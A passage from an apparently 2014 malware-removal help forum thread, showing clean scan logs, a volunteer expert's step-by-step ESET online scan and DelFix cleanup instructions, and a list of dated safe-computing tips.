    OS: Windows 7 Professional x64
    Ran by gluskid on Thu 12/18/2014 at 16:37:52.13
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    ~~~ Services



    ~~~ Registry Values



    ~~~ Registry Keys



    ~~~ Files



    ~~~ Folders



    ~~~ Event Viewer Logs were cleared





    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on Thu 12/18/2014 at 16:43:42.98
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 12/18/2014
    Scan Time: 3:52:26 PM
    Logfile:
    Administrator: Yes

    Version: 2.00.4.1028
    Malware Database: v2014.12.18.05
    Rootkit Database: v2014.12.14.01
    License: Trial
    Malware Protection: Disabled
    Malicious Website Protection: Disabled
    Self-protection: Disabled

    OS: Windows 7 Service Pack 1
    CPU: x64
    File System: NTFS
    User: gluskid

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 404646
    Time Elapsed: 17 min, 54 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Enabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 0
    (No malicious items detected)

    Modules: 0
    (No malicious items detected)

    Registry Keys: 0
    (No malicious items detected)

    Registry Values: 0
    (No malicious items detected)

    Registry Data: 0
    (No malicious items detected)

    Folders: 0
    (No malicious items detected)

    Files: 0
    (No malicious items detected)

    Physical Sectors: 0
    (No malicious items detected)


    (end)

  6. #6
    Security Expert-emeritus Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    4,084

    Default

    Tell me how the computer is at the moment.

    What we can do now is run an online scan with Eset, for the time being it is our most trusted scanner.
    Most reliable and thorough.
    The settings I suggest will show us items located in quarantine folders so don't be alarmed with this, also, in case of a false positive I ask that you not allow it to delete what it does find.
    This scanner can take quite a bit of time to run, depending of course on how full your computer is.


    Go here to run an online scanner from ESET. Windows Vista/Windows 7/Windows 8 users will need to right click on their Internet Explorer shortcut, and select Run as Administrator
    • Note:
      For browsers other than Internet Explorer, you will be prompted to download and install esetsmartinstaller_enu.exe. Click on the link and save the file to a convenient location. Double click on it to install and a new window will open. Follow the prompts.
    • Turn off the real time scanner of any existing antivirus program while performing the online scan. Here's how.
    • Click the blue Run ESET Online Scanner button
    • Tick the box next to YES, I accept the Terms of Use.
    • Click Start
    • When asked, allow the program to install the "OnlineScanner.cab" ActiveX control by clicking the Install button
    • Once the ActiveX control is installed, on the next screen click on Enable detection of potentially unwanted applications
    • Click on Advanced Settings
    • Make sure that the option Remove found threats is unticked.
    • Ensure these options are ticked
      • Scan archives
      • Scan for potentially unsafe applications
      • Enable Anti-Stealth technology

    • Click Start
    • Wait for the scan to finish
    • When the scan is done, if it shows a screen that says "Threats found!", then click "List of found threats", and then click "Export to text file..."
    • Save that text file on your desktop. Copy and paste the contents of that log as a reply to this topic.
    • Close the ESET online scan.


    *************************************
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.

  7. #7
    Junior Member
    Join Date
    Dec 2014
    Posts
    6

    Default Computer is operating great

    The Eset scan showed no threats.

  8. #8
    Security Expert-emeritus Juliet
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    4,084

    Default

    Tell me how the computer is at the moment.

  9. #9
    Junior Member
    Join Date
    Dec 2014
    Posts
    6

    Default Running great.

    I have tried various programs and everything seems normal.

  10. #10
    Security Expert-emeritus Juliet
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    4,084

    Default

    DelFix
    • Please download DelFix and save the file to your Desktop.
    • Double-click DelFix.exe to run the programme.
    • Place a checkmark next to the following items:
      • Activate UAC
      • Remove disinfection tools
      • Create registry backup
      • Purge system restore
      • Reset system settings

    • Click the Run button.

    -- This will remove the specialised tools we used to disinfect your system. Any leftover logs, files, folders or tools remaining on your Desktop which were not removed can be deleted manually (right-click the file + delete).


    ~~~~~~~~~~~~~~~~~~

    You're good to go, good job!

    Please take the time to read over a few of my preventive tips.

    Computer Security
    http://malwareremoval.com/forum/view...557960#p557960
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Be prepared for CryptoLocker:

    Cryptolocker Ransomware: What You Need To Know

    CryptoLocker Ransomware Information Guide and FAQ

    To help protect your computer in the future I recommend that you get the following free programmes:

    CryptoPrevent: install this programme to lock down and prevent crypto ransomware



    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Please navigate to Microsoft Windows Updates and download all the "Critical Updates" for Windows.


    Firefox 3
    The award-winning Web browser is now faster, more secure, and fully customizable to your online life. With Firefox 3, added powerful new features that make your online experience even better. It has more features and is a lot more secure than IE. It is a very easy and painless download and install, it will in no way interfere with IE, you can use them both.
    *NoScript - Addon for Firefox that stops all scripts from running on websites. Stops malicious software from invading via flash, java, javascript, and many other entry points.

    AdblockPlus
    • AdblockPlus, Surf the web without annoying ads!
    • Blocks banners, pop-ups and video ads - even on Facebook and YouTube
    • Protects your online privacy
    • Two-click installation, It's free!
    • click the icon that corresponds to your browser and download.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    WOT Web of Trust, warns you about risky websites that try to scam visitors, deliver malware or send spam. Protect your computer against online threats by using WOT as your front-line layer of protection when browsing or searching in unfamiliar territory. WOT's color-coded icons show you ratings for 21 million websites - green to go, yellow for caution and red to stop, helping you avoid the dangerous sites. WOT has an addon available for both Firefox and IE.
    • Green should be good to go
    • Yellow for caution
    • Red to stop



    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    How to prevent Malware: Created by Miekiemoes


    WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
    See this article (http://www.forbes.com/sites/eliseack...-disable-java/)
    and this article (http://www.nbcnews.com/technology/te...late-1B7938755)

    I would recommend that you completely uninstall Java unless you need it to run important software.
    In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to disable Java in your web browser (http://www.geekstogo.com/2600/how-to...r-web-browser/) and How to unplug Java from the browser (http://krebsonsecurity.com/how-to-un...m-the-browser/))


    Avoid P2P

    P2P may be a great way to get lots of stuff, but it is a great way to get infected as well. There's no way to tell if the file being shared is infected. Worse still, some worms spread via P2P networks, infecting you as well.

    Please read these short reports on the dangers of peer-2-peer programs and file sharing.

    *********************************************
    Please read the following safe computing articles..

    Secure My Computer: A Layered Approach


    Free Antivirus-AntiSpyware-Firewall Software

    Keep a backup of your important files - Now, more than ever, it's especially important to protect your digital files and memories. This article is full of good information on alternatives for home backup solutions.


    • It is possible for other programs on your computer to have security vulnerabilities that can allow malware to infect you.
    • Therefore, it is also a good idea to check for the latest versions of commonly installed applications that are regularly patched to fix vulnerabilities.
    • You can check these by visiting Secunia Software Inspector or you can use the following application for this purpose PatchMyPC
